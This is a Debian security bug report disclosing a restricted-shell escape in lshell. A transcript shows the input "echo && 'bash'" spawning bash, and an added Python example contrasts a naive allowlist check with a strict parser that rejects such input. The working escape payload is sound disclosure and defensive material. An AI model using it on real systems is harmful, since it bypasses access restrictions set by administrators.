[Secure-testing-team] Bug#834949: lshell: Shell outbreak due to bad syntax parse
Vladislav Yarmak
yarmak.vladislav at gmail.com
Sat Aug 20 20:15:12 UTC 2016
Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole
lshell fails to parse shell syntax correctly and restrictions can be overrun:
root@debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root@debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd clear echo exit help history ll lpath ls lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo && 'bash'
testuser@debian:~$ ps -f
UID        PID  PPID  C STIME TTY          TIME CMD
testuser  4000  3999  0 23:12 pts/1    00:00:00 /usr/bin/python /usr/bin/lshell
testuser  4001  4000  0 23:12 pts/1    00:00:00 sh -c set -m; echo && 'bash'
testuser  4002  4001  0 23:12 pts/1    00:00:00 bash
testuser  4007  4002  0 23:13 pts/1    00:00:00 ps -f
The problem exists in the current upstream code. There is an open issue on GitHub but no reaction yet: https://github.com/ghantoos/lshell/issues/147.
The command parser in this shell is beyond recovery. I recommend replacing this shell with a symlink to /usr/sbin/nologin.
-- System Information:
Debian Release: 8.5
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages lshell depends on:
ii adduser 3.113+nmu3
ii python 2.7.9-1
lshell recommends no packages.
lshell suggests no packages.
-- no debconf information
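The `ps -f` output above shows the mechanism: the restricted shell accepts the line because the first word is an allowed command, then hands the whole string to `sh -c`, which honours the `&&` and the quotes and launches `bash`. The following is an added example written for this page, not lshell's own code: `naive_allowed` is a hypothetical model of a first-word allowlist check (it is not a claim about lshell's actual implementation), while `parse_commands` and `run_line` show a fail-closed alternative that tokenises with POSIX quoting rules, checks the word at every command position, and executes argv lists without any shell in between. The allowlist is the one printed by `?` in the report; everything else (names, operator set, rejection rules) is an assumption of this example.

```python
"""Added example (not lshell's code): a first-word allowlist is not a shell
parser.  Shows why "echo && 'bash'" passes a naive check and how a
fail-closed parser that honours quoting and control operators rejects it."""
import shlex
import subprocess
from typing import List, Optional, Tuple

# Allowlist as printed by '?' in the bug report.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}
# Operators that separate simple commands (assumed set for this example);
# the word after each one is a new command and must be allowlisted too.
SEQ_OPS = {";", "&&", "||"}


def naive_allowed(line: str) -> bool:
    """Hypothetical model of a first-word check (NOT lshell's real code).
    Only the first whitespace-separated word is inspected, so the quoted
    'bash' after '&&' is never compared against the allowlist."""
    words = line.split()
    return bool(words) and words[0] in ALLOWED


def parse_commands(line: str) -> Optional[List[Tuple[str, List[str]]]]:
    """Split a line into (preceding_operator, argv) pairs using POSIX quoting
    rules.  Returns None (reject) on unbalanced quotes, unsupported
    punctuation ('|', '&', '(', ')', '<', '>'), '$' or backtick expansion,
    an empty command (including a trailing separator) or a command word that
    is not allowlisted.  The operator is '' for the first command."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    try:
        tokens = list(lexer)          # quotes are removed: "'bash'" -> "bash"
    except ValueError:                # e.g. "No closing quotation"
        return None
    punct = set(lexer.punctuation_chars)
    commands: List[Tuple[str, List[str]]] = []
    op, argv = "", []                 # type: str, List[str]
    for tok in tokens + [";"]:        # sentinel flushes the last command
        if tok in SEQ_OPS:
            if not argv or argv[0] not in ALLOWED:
                return None           # empty command or forbidden word
            commands.append((op, argv))
            op, argv = tok, []
        elif set(tok) & punct or tok.startswith("$") or "`" in tok:
            # Pipe, background, subshell, redirection or expansion: reject
            # even when quoted, because the real lshell passes the string to
            # 'sh -c' and this filter must not rely on quoting surviving.
            return None
        else:
            argv.append(tok)
    return commands


def run_line(line: str) -> Optional[int]:
    """Execute an accepted line without a shell, honouring ';', '&&' and
    '||'.  Returns the last exit status, or None if the line was rejected.
    The argv list goes straight to exec; no string is ever rebuilt for
    'sh -c', so quotes and operators cannot be reinterpreted downstream.
    (A real restricted shell would dispatch builtins such as cd/exit/help
    internally instead of spawning them; omitted here for brevity.)"""
    commands = parse_commands(line)
    if commands is None:
        return None
    status = 0
    for op, argv in commands:
        if op == "&&" and status != 0:
            continue                  # previous command failed: skip
        if op == "||" and status == 0:
            continue                  # previous command succeeded: skip
        status = subprocess.run(argv).returncode
    return status


if __name__ == "__main__":
    payload = "echo && 'bash'"
    print("naive check accepts payload:", naive_allowed(payload))   # True
    print("strict parser accepts payload:", parse_commands(payload) is not None)  # False
    print("exit status of 'echo hi && ls -la':", run_line("echo hi && ls -la"))
```

The two properties that matter are that every command position is checked, not just the first word, and that the accepted argv lists are executed directly rather than re-serialised into a string for `sh -c`. With those in place the `&&` in the report's payload is a token the filter sees, and `bash` is rejected like any other non-allowlisted word.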